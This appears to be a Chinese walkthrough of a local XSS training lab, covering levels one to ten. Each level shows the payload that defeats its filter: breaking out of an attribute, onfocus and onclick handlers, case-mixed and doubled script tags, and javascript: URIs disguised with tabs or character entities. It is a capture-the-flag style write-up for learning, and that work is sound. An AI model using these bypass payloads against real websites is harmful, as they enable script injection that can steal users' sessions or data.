XSS靶机

localhost:8083/xss/level1.php?name=test<script>alert(1)</script>

XSS靶机

第二关

XSS靶机

源码

XSS靶机

文本框输入js代码,查看源码

XSS靶机

由于第一个,[<]被转义,因此在第二个里试

源代码的样式

<input name=keyword value="  ">

插入的代码

"><script>alert(1)</script><a class="

完整显示的代码

<input name=keyword value=""><script>alert(1)</script><a class="">

XSS靶机

第三关

"><script>alert(1)</script><aclass="

XSS靶机

第二个也对[<]做了转义,是单引号

<input name=keyword value='  '>' onfocus='alert(1)<input name=keyword value='' onfocus='alert(1)'>

XSS靶机

第四关

XSS靶机

双引号

<input name=keyword value="  ">" onfocus="alert(1)<input name=keyword value=""  onfocus="alert(1)">

XSS靶机

第五关

XSS靶机

双引号,对on进行过滤

"><ScRiPt>alert(1)</script><a class="

XSS靶机

对script进行过滤

<input name=keyword value="  ">"><a href="javascript:alert(1)">点击我</a class="<input name=keyword value=" "><a href="javascript:alert(1)">点击我</a class=" ">

XSS靶机

第六关

XSS靶机

对href进行了过滤

<input name=keyword value="  ">"><ScRiPt>alert(1)</script><a class="<input name=keyword value=""><ScRiPt>alert(1)</script><a class="">

XSS靶机

第七关

XSS靶机

<input name=keyword value="  ">"><scrscriptipt>alert(1)</scscriptript><a class="<input name=keyword value=""><scrscriptipt>alert(1)</scscriptript><a class="">

XSS靶机

第八关

XSS靶机

对script进行了过滤

使用伪事件(用tab进行反过滤)

<a href="  ">javasc                ript:alert(1)<a href="javasc         ript:alert(1)">

XSS靶机

第九关

 

XSS靶机

发现只有使用http://,且他们为完整的就行

伪事件(将r转化为10进制)

<a href="  ">javasc&#114;ipt:alert('http://')<a href="javasc&#114;ipt:alert('http://')">

XSS靶机

第十关

XSS靶机

有三个input标签被隐藏,在url上看看

?keyword=well done!&t_link=111&t_history=222&t_sort=333

XSS靶机

第三个input标签有显示,在这个上面想方法

<input name="t_sort" value="333" type="hidden">&t_sort=333" onclick=alert(1) type="text<input name="t_sort"  value="333" onclick=alert(1)type="text " type="hidden">

把input显示出来 

XSS靶机



相关文章:

  • 2021-12-22
  • 2021-11-12
  • 2021-09-12
  • 2022-02-05
  • 2021-08-14
  • 2022-12-23
  • 2022-12-23
  • 2021-09-17
猜你喜欢
  • 2021-09-01
  • 2021-11-23
  • 2022-12-23
  • 2021-09-21
  • 2022-12-23
  • 2022-12-23
  • 2021-09-08
相关资源
相似解决方案